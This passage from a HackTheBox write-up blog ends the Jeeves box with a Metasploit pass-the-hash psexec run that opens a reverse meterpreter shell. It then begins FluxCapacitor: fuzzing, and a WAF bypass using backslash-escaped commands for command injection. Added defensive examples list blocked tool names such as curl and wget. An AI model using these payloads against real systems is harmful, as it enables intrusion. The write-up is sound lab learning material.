&lt;p&gt;&lt;img src=&quot;https://i.imgur.com/W9jh3Sn.png&quot; alt=&quot;Credential &amp;amp; Hash Spraying with CrackMapExec&quot; title=&quot;Credential &amp;amp; Hash Spraying with CrackMapExec&quot; /&gt;&lt;/p&gt;

&lt;h5 id=&quot;shell-with-metasploit-psexec-module--hash&quot;&gt;Shell with Metasploit PSEXEC Module &amp;amp; Hash&lt;/h5&gt;

&lt;p&gt;With a valid hash of the administrator account, we can perform a pass-the-hash attack &amp;amp; compromise the machine. I chose to use Metasploit for this, but there are plenty of tools which do the same thing as this module.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Getting SYSTEM shell with msf psexec&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;msf &amp;gt; use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) &amp;gt; options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting                                                    Required  Description
   ----                  ---------------                                                    --------  -----------
   RHOST                 10.10.10.63                                                        yes       The target address
   RPORT                 445                                                                yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                                                                      no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                     no        The service display name
   SERVICE_NAME                                                                             no        The service name
   SHARE                 ADMIN$                                                             yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                                  no        The Windows domain to use for authentication
   SMBPass               aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00  no        The password for the specified username
   SMBUser               Administrator                                                      no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.15.30      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic
   
msf exploit(windows/smb/psexec) &amp;gt; exploit -j -z
[*] Exploit running as background job 2.

[*] Started reverse TCP handler on 10.10.15.30:4444
[*] 10.10.10.63:445 - Connecting to the server...
[*] 10.10.10.63:445 - Authenticating to 10.10.10.63:445 as user 'Administrator'...
[*] 10.10.10.63:445 - Selecting PowerShell target
[*] 10.10.10.63:445 - Executing the payload...
[+] 10.10.10.63:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 10.10.10.63
[*] Meterpreter session 3 opened (10.10.15.30:4444 -&amp;gt; 10.10.10.63:49686) at 2018-05-17 00:18:23 -0400
msf exploit(windows/smb/psexec) &amp;gt; sessions -i 3
[*] Starting interaction with 3...

meterpreter &amp;gt; getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter &amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;h2 id=&quot;getting-the-hidden-roottxt&quot;&gt;Getting the “Hidden” root.txt&lt;/h2&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;meterpreter &amp;gt; cat hm.txt
The flag is elsewhere.  Look deeper
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;We drop into a regular shell, and run a &lt;code class=&quot;highlighter-rouge&quot;&gt;dir /a&lt;/code&gt; which will show all files with the “hidden” attribute set.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;C:\Users\Administrator\Desktop&amp;gt;dir /a

 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    &amp;lt;DIR&amp;gt;          .
11/08/2017  10:05 AM    &amp;lt;DIR&amp;gt;          ..
11/03/2017  10:03 PM               282 desktop.ini
12/24/2017  03:51 AM                36 hm.txt
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               3 File(s)          1,115 bytes
               2 Dir(s)   7,032,709,120 bytes free

&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;dir /a&lt;/code&gt; already shows every file with the hidden attribute set, so the flag is likely being hidden by some other means.&lt;/p&gt;

&lt;p&gt;In Windows the only ways you can really hide a file are setting the &lt;code class=&quot;highlighter-rouge&quot;&gt;hidden attribute&lt;/code&gt; with &lt;code class=&quot;highlighter-rouge&quot;&gt;attrib +h &quot;whatever_thing_here&quot;&lt;/code&gt; or using something called an &lt;a href=&quot;https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/&quot;&gt;Alternate Data Stream&lt;/a&gt;, which is an NTFS-specific feature.&lt;/p&gt;

&lt;p&gt;To list files together with their alternate data streams, run &lt;code class=&quot;highlighter-rouge&quot;&gt;dir /R&lt;/code&gt;:&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;C:\Users\Administrator\Desktop&amp;gt;dir /R

 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    &amp;lt;DIR&amp;gt;          .
11/08/2017  10:05 AM    &amp;lt;DIR&amp;gt;          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   7,030,882,304 bytes free
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;p&gt;The &lt;code class=&quot;highlighter-rouge&quot;&gt;hm.txt:root.txt:$DATA&lt;/code&gt; entry (34 bytes) means that &lt;code class=&quot;highlighter-rouge&quot;&gt;hm.txt&lt;/code&gt; carries an alternate data stream named &lt;code class=&quot;highlighter-rouge&quot;&gt;root.txt&lt;/code&gt; alongside its normal contents.&lt;/p&gt;

&lt;p&gt;You can see the contents of an ADS a few different ways, but the simplest in my opinion is redirecting the stream into the &lt;code class=&quot;highlighter-rouge&quot;&gt;more&lt;/code&gt; command on Windows…&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;C:\Users\Administrator\Desktop&amp;gt;more &amp;lt; hm.txt:root.txt
...[FLAG REDACTED]...
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
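&lt;p&gt;As an added example that is not part of the original write-up, the PowerShell below is the defender’s counterpart to the &lt;code class=&quot;highlighter-rouge&quot;&gt;dir /R&lt;/code&gt; check above: it sweeps a directory tree for every NTFS stream that is not a file’s default stream, then reads one back with &lt;code class=&quot;highlighter-rouge&quot;&gt;Get-Content -Stream&lt;/code&gt;. The scratch directory under $env:TEMP and the stream contents are constructed for the demo.&lt;/p&gt;

```powershell
# Added example, not code from the original write-up.
# Lists every NTFS stream that is not a file's default ':$DATA' stream under a
# directory tree, which is what "dir /R" surfaces one directory at a time.
function Find-AlternateDataStream {
    param(
        [Parameter(Mandatory)][string]$Path,
        # Zone.Identifier streams are written to downloaded files (mark-of-the-web)
        # and are usually benign noise; include them only when asked.
        [switch]$IncludeZoneIdentifier
    )
    Get-ChildItem -LiteralPath $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            # -Stream * returns one record per stream; the default one is named ':$DATA'.
            Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue
        } |
        Where-Object { $_.Stream -ne ':$DATA' } |
        Where-Object { $IncludeZoneIdentifier -or $_.Stream -ne 'Zone.Identifier' } |
        Select-Object @{ n = 'File'; e = { $_.FileName } },
                      @{ n = 'Stream'; e = { $_.Stream } },
                      @{ n = 'Bytes'; e = { $_.Length } }
}

# Constructed demo: recreate the page's hm.txt layout in a scratch directory,
# then find the hidden stream and read it back.
$dir  = Join-Path $env:TEMP 'ads-demo'
New-Item -ItemType Directory -Path $dir -Force | Out-Null
$file = Join-Path $dir 'hm.txt'
Set-Content -LiteralPath $file -Value 'The flag is elsewhere.  Look deeper'
Set-Content -LiteralPath $file -Stream 'root.txt' -Value 'constructed stream contents'

# Expected: one row, File hm.txt, Stream root.txt
Find-AlternateDataStream -Path $dir | Format-Table -AutoSize

# Read a named stream directly (the PowerShell form of the "more" trick above).
Get-Content -LiteralPath $file -Stream 'root.txt'

# Remediation that keeps the file but drops the stream.
Remove-Item -LiteralPath $file -Stream 'root.txt'
```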

&lt;p&gt;Box Complete :)&lt;/p&gt;

&lt;h3 id=&quot;references&quot;&gt;References&lt;/h3&gt;
&lt;p&gt;https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password&lt;/p&gt;

&lt;p&gt;http://www.labofapenetrationtester.com/2014/06/hacking-jenkins-servers.html&lt;/p&gt;

&lt;p&gt;https://medium.com/@exgq/hacking-jenkins-68f7f6a810eb&lt;/p&gt;

&lt;p&gt;https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS16-075/potato.exe&lt;/p&gt;

&lt;p&gt;https://www.rubydevices.com.au/blog/how-to-hack-keepass&lt;/p&gt;

&lt;p&gt;https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html&lt;/p&gt;

&lt;p&gt;http://www.harmj0y.net/blog/penetesting/pass-the-hash-is-dead-long-live-pass-the-hash/&lt;/p&gt;</content><author><name>A Medic (@OnlyaMedic)</name></author><category term="writeup" /><category term="pentesting" /><category term="hackthebox" /><summary type="html">I honestly had a whole lot of fun with Jeeves. It had multiple ways of attacking/rooting it, while also being a very realistic example of something that you would see the real world. It wasn’t an extremely difficult box, but you definitely had to do a little research to be successful in successfully rooting it. Definitely adding Jeeves to my list of HTB favorites.</summary></entry><entry><title type="html">Hack the Box - FluxCapacitor Write up</title><link href="https://dastinia.io/write-up/hackthebox/2018/05/13/hackthebox-fluxcapacitor-writeup/" rel="alternate" type="text/html" title="Hack the Box - FluxCapacitor Write up" /><published>2018-05-13T00:00:00-04:00</published><updated>2018-05-13T00:00:00-04:00</updated><id>https://dastinia.io/write-up/hackthebox/2018/05/13/hackthebox-fluxcapacitor-writeup</id><content type="html" xml:base="https://dastinia.io/write-up/hackthebox/2018/05/13/hackthebox-fluxcapacitor-writeup/">&lt;h3 id=&quot;intro&quot;&gt;Intro&lt;/h3&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/htb/fluxcapacitor/1.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;FluxCapacitor was a pretty interesting, but also annoying &amp;amp; frustrating box the first time I did it, mainly due to my lack of experience with &lt;code class=&quot;highlighter-rouge&quot;&gt;wfuzz&lt;/code&gt;. Overall, once I finally completed the box and took a second pass at it, flux taught me quite a few tricks, especially when it came to web fuzzing utilities. I highly recommend you take a crack at it if you have the time.&lt;/p&gt;

&lt;h3 id=&quot;tools-used&quot;&gt;Tools Used&lt;/h3&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://nmap.org/&quot;&gt;Nmap&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/xmendez/wfuzz&quot;&gt;wfuzz&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;cURL&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/craSH/socat&quot;&gt;socat&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3 id=&quot;initial-scanning&quot;&gt;Initial Scanning&lt;/h3&gt;

&lt;p&gt;Let’s begin by scanning the FluxCapacitor machine (10.10.10.69) with nmap.&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;gp&quot;&gt;root@dastinia:~/htb/fluxcapacitor# &lt;/span&gt;nmap -T4 -sC -sV -n 10.10.10.69 -oA fluxcapacitor_inital

Starting Nmap 7.70 &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt; https://nmap.org &lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; at 2018-05-09 18:50 EDT
Nmap scan report &lt;span class=&quot;k&quot;&gt;for &lt;/span&gt;10.10.10.69
Host is up &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;0.18s latency&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt;.
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    SuperWAF
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Date: Wed, 09 May 2018 22:50:46 GMT
......... &lt;span class=&quot;o&quot;&gt;[&lt;/span&gt;TRUNCATED]......
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;From our initial scan it seems as though the only service flux exposes is a web server. In the background, I’ll go ahead and run a full port scan to make sure I didn’t miss any additional ports/services.&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;gp&quot;&gt;root@dastinia:~/htb/fluxcapacitor# &lt;/span&gt;nmap -T4 -sC -sV -n -p- 10.10.10.69 -oA fluxcapacitor_fullscan
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;h3 id=&quot;enumeration&quot;&gt;Enumeration&lt;/h3&gt;
&lt;p&gt;Visiting the web server in our browser gives us a pretty bare and uneventful site.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/htb/fluxcapacitor/2.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Viewing the source of the site reveals some interesting information in a comment.&lt;/p&gt;

&lt;div class=&quot;language-html highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;cp&quot;&gt;&amp;lt;!DOCTYPE html&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;html&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;head&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;title&amp;gt;&lt;/span&gt;Keep Alive&lt;span class=&quot;nt&quot;&gt;&amp;lt;/title&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;/head&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;body&amp;gt;&lt;/span&gt;
	OK: node1 alive
	&lt;span class=&quot;c&quot;&gt;&amp;lt;!--
		Please, add timestamp with something like:
		&amp;lt;script&amp;gt; $.ajax({ type: &quot;GET&quot;, url: '/sync' }); &amp;lt;/script&amp;gt;
	--&amp;gt;&lt;/span&gt;
	&lt;span class=&quot;nt&quot;&gt;&amp;lt;hr/&amp;gt;&lt;/span&gt;
	FluxCapacitor Inc. info@fluxcapacitor.htb - http://fluxcapacitor.htb&lt;span class=&quot;nt&quot;&gt;&amp;lt;br&amp;gt;&lt;/span&gt;
	&lt;span class=&quot;nt&quot;&gt;&amp;lt;em&amp;gt;&amp;lt;met&amp;gt;&amp;lt;doc&amp;gt;&amp;lt;brown&amp;gt;&lt;/span&gt;Roads? Where we're going, we don't need roads.&lt;span class=&quot;nt&quot;&gt;&amp;lt;/brown&amp;gt;&amp;lt;/doc&amp;gt;&amp;lt;/met&amp;gt;&amp;lt;/em&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;It seems that there is a route for a page located at &lt;code class=&quot;highlighter-rouge&quot;&gt;/sync&lt;/code&gt; in this application, which potentially has something to do with time. Attempting to visit the &lt;code class=&quot;highlighter-rouge&quot;&gt;/sync&lt;/code&gt; page in our browser immediately lands us on a &lt;code class=&quot;highlighter-rouge&quot;&gt;403 Forbidden&lt;/code&gt; error message.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/htb/fluxcapacitor/3.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;After doing some research on &lt;code class=&quot;highlighter-rouge&quot;&gt;openresty/1.13.6.1&lt;/code&gt;, I discovered that &lt;a href=&quot;https://github.com/openresty/openresty&quot;&gt;OpenResty&lt;/a&gt;, from what I understood, is a scriptable web server built on nginx.&lt;/p&gt;

&lt;p&gt;I tried cURL’ing the page to see if there was any sort of “filtering” or content change based on what client you used to access the page.&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;gp&quot;&gt;root@dastinia:~# &lt;/span&gt;curl  http://10.10.10.69/sync
20180513T23:25:20
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Awesome, we see a timestamp. After a bit of fiddling around, you discover that certain user agents are being filtered, such as the &lt;code class=&quot;highlighter-rouge&quot;&gt;firefox&lt;/code&gt; &amp;amp; &lt;code class=&quot;highlighter-rouge&quot;&gt;gobuster&lt;/code&gt; user agents.&lt;/p&gt;

&lt;h3 id=&quot;fuzzing-sync&quot;&gt;Fuzzing /sync&lt;/h3&gt;
&lt;p&gt;We know that &lt;code class=&quot;highlighter-rouge&quot;&gt;/sync&lt;/code&gt; is doing &lt;em&gt;something&lt;/em&gt; under the hood, so the next step we can take is to fuzz for parameters &amp;amp; see how the application reacts, in the hopes of discovering additional functionality. We can use the &lt;code class=&quot;highlighter-rouge&quot;&gt;wfuzz&lt;/code&gt; tool to complete this task.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/fluxcapacitor# wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.10.10.69/sync?FUZZ=echo

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.9 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.69/sync?FUZZ=hostname
Total requests: 220560

==================================================================
ID      Response   Lines      Word         Chars          Payload
==================================================================

000001:  C=200      2 L        1 W           19 Ch        &quot;# directory-list-2.3-medium.txt&quot;
000002:  C=200      2 L        1 W           19 Ch        &quot;#&quot;
000007:  C=200      2 L        1 W           19 Ch        &quot;# license, visit http://creativecommons.org/licenses/by-sa/3.0/&quot;
000003:  C=200      2 L        1 W           19 Ch        &quot;# Copyright 2007 James Fisher&quot;
000004:  C=200      2 L        1 W           19 Ch        &quot;#&quot;
000005:  C=200      2 L        1 W           19 Ch        &quot;# This work is licensed under the Creative Commons&quot;
000006:  C=200      2 L        1 W           19 Ch        &quot;# Attribution-Share Alike 3.0 License. To view a copy of this&quot;
000008:  C=200      2 L        1 W           19 Ch        &quot;# or send a letter to Creative Commons, 171 Second Street,&quot;
000009:  C=200      2 L        1 W           19 Ch        &quot;# Suite 300, San Francisco, California, 94105, USA.&quot;
000010:  C=200      2 L        1 W           19 Ch        &quot;#&quot;
000027:  C=200      2 L        1 W           19 Ch        &quot;search&quot;
000028:  C=200      2 L        1 W           19 Ch        &quot;spacer&quot;
000030:  C=200      2 L        1 W           19 Ch        &quot;11&quot;
000029:  C=200      2 L        1 W           19 Ch        &quot;privacy&quot;
000031:  C=200      2 L        1 W           19 Ch        &quot;logo&quot;
000032:  C=200      2 L        1 W           19 Ch        &quot;blog&quot;
000033:  C=200      2 L        1 W           19 Ch        &quot;new&quot;
000011:  C=200      2 L        1 W           19 Ch        &quot;# Priority ordered case sensative list, where entries were found&quot;
000034:  C=200      2 L        1 W           19 Ch        &quot;10&quot;
000035:  C=200      2 L        1 W           19 Ch        &quot;cgi-bin&quot;
000036:  C=200      2 L        1 W           19 Ch        &quot;faq&quot;
000037:  C=200      2 L        1 W           19 Ch        &quot;rss&quot;
000040:  C=200      2 L        1 W           19 Ch        &quot;default&quot;
000038:  C=200      2 L        1 W           19 Ch        &quot;home&quot;
000039:  C=200      2 L        1 W           19 Ch        &quot;img&quot;
000041:  C=200      2 L        1 W           19 Ch        &quot;2005&quot;
........[TRUNCATED]........
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;As we can see we are getting a large number of &lt;code class=&quot;highlighter-rouge&quot;&gt;200&lt;/code&gt; responses, all with a length of &lt;code class=&quot;highlighter-rouge&quot;&gt;19&lt;/code&gt; characters. They are basically the &lt;code class=&quot;highlighter-rouge&quot;&gt;time&lt;/code&gt; garbage responses, so we can use this as the baseline of stuff to ignore/filter out: anything different from the &lt;code class=&quot;highlighter-rouge&quot;&gt;200&lt;/code&gt; or &lt;code class=&quot;highlighter-rouge&quot;&gt;Char 19&lt;/code&gt; is something we should potentially investigate further.&lt;/p&gt;
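&lt;p&gt;The triage described above, as an added example that is not the write-up's own code: it parses a saved wfuzz result table, takes the most common (status, chars) pair as the baseline, lists the rows that deviate, and prints the hide flag that reproduces the triage on the next run. The sample rows are constructed in wfuzz 2.2.9's table layout, not a real capture.&lt;/p&gt;

```python
"""Derive a wfuzz response baseline and report the payloads that deviate.

Added example, not code from the write-up. The write-up eyeballs the
first run, notices that nearly every payload comes back 200 / 19 chars,
and then re-runs with --hh=19. This does the same triage on a saved run:
parse wfuzz's table, take the most common (status, chars) pair as the
"boring" baseline, and list everything else.
"""
import re
from collections import Counter

# Constructed sample in wfuzz 2.2.9's table layout (not a real capture).
SAMPLE_OUTPUT = """\
ID      Response   Lines      Word         Chars          Payload
==================================================================

000001:  C=200      2 L        1 W           19 Ch        "search"
000002:  C=200      2 L        1 W           19 Ch        "spacer"
000003:  C=200      2 L        1 W           19 Ch        "privacy"
009874:  C=403      7 L       10 W          175 Ch        "opt"
010679:  C=200      2 L        1 W           19 Ch        "NAS"
011000:  C=500      3 L        4 W           42 Ch        "debug"
"""

# groups: id, status, lines, words, chars, payload
ROW_RE = re.compile(r'^(\d+):\s+C=(\d+)\s+(\d+) L\s+(\d+) W\s+(\d+) Ch\s+"(.*)"\s*$')


def parse_rows(text):
    """One dict per result row; header and separator lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append({"id": int(m.group(1)), "code": int(m.group(2)),
                         "lines": int(m.group(3)), "words": int(m.group(4)),
                         "chars": int(m.group(5)), "payload": m.group(6)})
    return rows


def baseline(rows):
    """Most frequent (status, chars) pair: the response most payloads share."""
    if not rows:
        raise ValueError("no result rows found")
    return Counter((r["code"], r["chars"]) for r in rows).most_common(1)[0][0]


def outliers(text):
    """Rows whose (status, chars) differ from the baseline: worth a manual look."""
    rows = parse_rows(text)
    base = baseline(rows)
    return [r for r in rows if (r["code"], r["chars"]) != base]


def suggest_filter(text):
    """The wfuzz hide flag that reproduces this triage on the next run
    (wfuzz 2.x: --hh hides by char count, --hc by status code)."""
    _, chars = baseline(parse_rows(text))
    return "--hh=%d" % chars


if __name__ == "__main__":
    for r in outliers(SAMPLE_OUTPUT):
        print("%06d  C=%d  %d Ch  %s" % (r["id"], r["code"], r["chars"], r["payload"]))
    print("next run:", suggest_filter(SAMPLE_OUTPUT))
```

&lt;p&gt;Pipe a real run into a file and pass its contents to &lt;code class=&quot;highlighter-rouge&quot;&gt;outliers()&lt;/code&gt;; the baseline is computed per run, so it also works when the garbage response is not 19 characters long.&lt;/p&gt;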

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/fluxcapacitor# wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hh=19 http://10.10.10.69/sync?FUZZ=echo

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.9 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.69/sync?FUZZ=echo
Total requests: 220560

==================================================================
ID      Response   Lines      Word         Chars          Payload
==================================================================

009874:  C=403      7 L       10 W          175 Ch        &quot;opt&quot;
010679:  C=200      2 L        1 W           19 Ch        &quot;NAS&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Interesting: we got a different response for one word that made it past our filter, which means that &lt;code class=&quot;highlighter-rouge&quot;&gt;opt&lt;/code&gt; has a high chance of being the parameter that &lt;code class=&quot;highlighter-rouge&quot;&gt;/sync&lt;/code&gt; is looking for.&lt;/p&gt;

&lt;p&gt;Side Note: This took some time, and looking back at it, I should have used a more tailored list like the &lt;a href=&quot;https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/burp-parameter-names.txt&quot;&gt;SecLists Burp Parameter Names&lt;/a&gt; word list. The second time around doing this box it took less than two minutes to find the correct parameter. In the future, I should do a bit more research into finding a more optimal list, as doing so would have made this much easier.&lt;/p&gt;

&lt;p&gt;After fiddling around with the formatting &amp;amp; trying a few different escape mechanisms (it would 403 if you just straight up gave it a command), code execution was successfully achieved.&lt;/p&gt;

&lt;h3 id=&quot;getting-code-execution&quot;&gt;Getting Code Execution&lt;/h3&gt;
&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;gp&quot;&gt;root@dastinia:~/htb/fluxcapacitor# &lt;/span&gt;curl &lt;span class=&quot;s2&quot;&gt;&quot;http://10.10.10.69/sync?opt='? &lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\h\o&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;stname'&quot;&lt;/span&gt;
fluxcapacitor
bash: -c: option requires an argument
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;gp&quot;&gt;root@dastinia:~/htb/fluxcapacitor# &lt;/span&gt;curl &lt;span class=&quot;s2&quot;&gt;&quot;http://10.10.10.69/sync?opt='? &lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\u\n&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;ame -a'&quot;&lt;/span&gt;
Linux fluxcapacitor 4.13.0-17-generic &lt;span class=&quot;c&quot;&gt;#20-Ubuntu SMP Mon Nov 6 10:04:08 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux&lt;/span&gt;
bash: -c: option requires an argument
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
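&lt;p&gt;Why the escaped spelling above gets through, as an added example that is not the write-up's code: a blocklist that matches substrings of the raw parameter never sees the word &lt;code class=&quot;highlighter-rouge&quot;&gt;hostname&lt;/code&gt;, but bash removes the backslashes before it looks the command up, so a filter sitting in front of a shell has to canonicalize the way the shell does. The blocklist words and the allowed shape of a legitimate &lt;code class=&quot;highlighter-rouge&quot;&gt;opt&lt;/code&gt; value are assumptions; the write-up never shows either.&lt;/p&gt;

```python
r"""Keyword blocklists versus shell canonicalization.

Added example, not code from the write-up. The write-up's /sync endpoint
rejects the word `hostname` but runs `\h\ostname`: bash strips the
backslashes before looking the command up, so the shell sees the same
word while a substring match on the raw parameter does not. A filter
that sits in front of a shell has to canonicalize the way the shell
does, and even then the robust control is an allowlist of the values
the parameter is actually meant to take, with no shell in the path.
"""
import re

# Constructed blocklist standing in for the WAF's (the real list is unknown).
BLOCKED_WORDS = ("hostname", "uname", "curl", "wget", "bash")


def naive_blocked(param):
    """What a substring blocklist on the raw parameter decides."""
    return any(word in param for word in BLOCKED_WORDS)


def shell_canonical(param):
    """Approximate bash's unquoting of an unquoted word: drop the backslash
    from every backslash-escaped character, which is what bash does before
    it resolves the command name."""
    return re.sub(r"\\(.)", r"\1", param)


def canonical_blocked(param):
    """Same blocklist, applied to what the shell would actually execute."""
    return naive_blocked(shell_canonical(param))


# Assumed legitimate shape of the opt value (the write-up never shows one):
# a short hostname-like token, nothing the shell could interpret.
ALLOWED_VALUE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]{0,62}$")


def allowlisted(param):
    """Positive validation: accept only values matching the expected shape."""
    return ALLOWED_VALUE.match(param) is not None


if __name__ == "__main__":
    for sample in ("hostname", r"\h\ostname", r"c\u\rl 10.10.14.27:9999", "node1"):
        print("%-28r naive=%-5s canonical=%-5s allowlisted=%s" % (
            sample, naive_blocked(sample), canonical_blocked(sample), allowlisted(sample)))
```

&lt;p&gt;The canonicalizing check closes this one gap, but it is still a blocklist; the allowlist plus never handing the value to a shell is the control that holds regardless of which escape the shell happens to accept.&lt;/p&gt;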
&lt;h3 id=&quot;getting-user-shell&quot;&gt;Getting User Shell&lt;/h3&gt;
&lt;p&gt;You very quickly find out that there’s a multitude of characters and words being filtered. The next objective is to get a reverse shell so we don’t have to keep interacting with it through &lt;code class=&quot;highlighter-rouge&quot;&gt;cURL&lt;/code&gt;. &lt;code class=&quot;highlighter-rouge&quot;&gt;Socat&lt;/code&gt; is my tool of choice; it’s so versatile that if I have the opportunity to use it, I will.&lt;/p&gt;

&lt;p&gt;Using forward slashes didn’t work particularly well with longer commands, so we are going to make the payload we want the &lt;code class=&quot;highlighter-rouge&quot;&gt;index.html&lt;/code&gt; of our &lt;code class=&quot;highlighter-rouge&quot;&gt;python SimpleHTTPServer&lt;/code&gt;, so that when we curl the page the command we want is what comes back, like so:&lt;/p&gt;

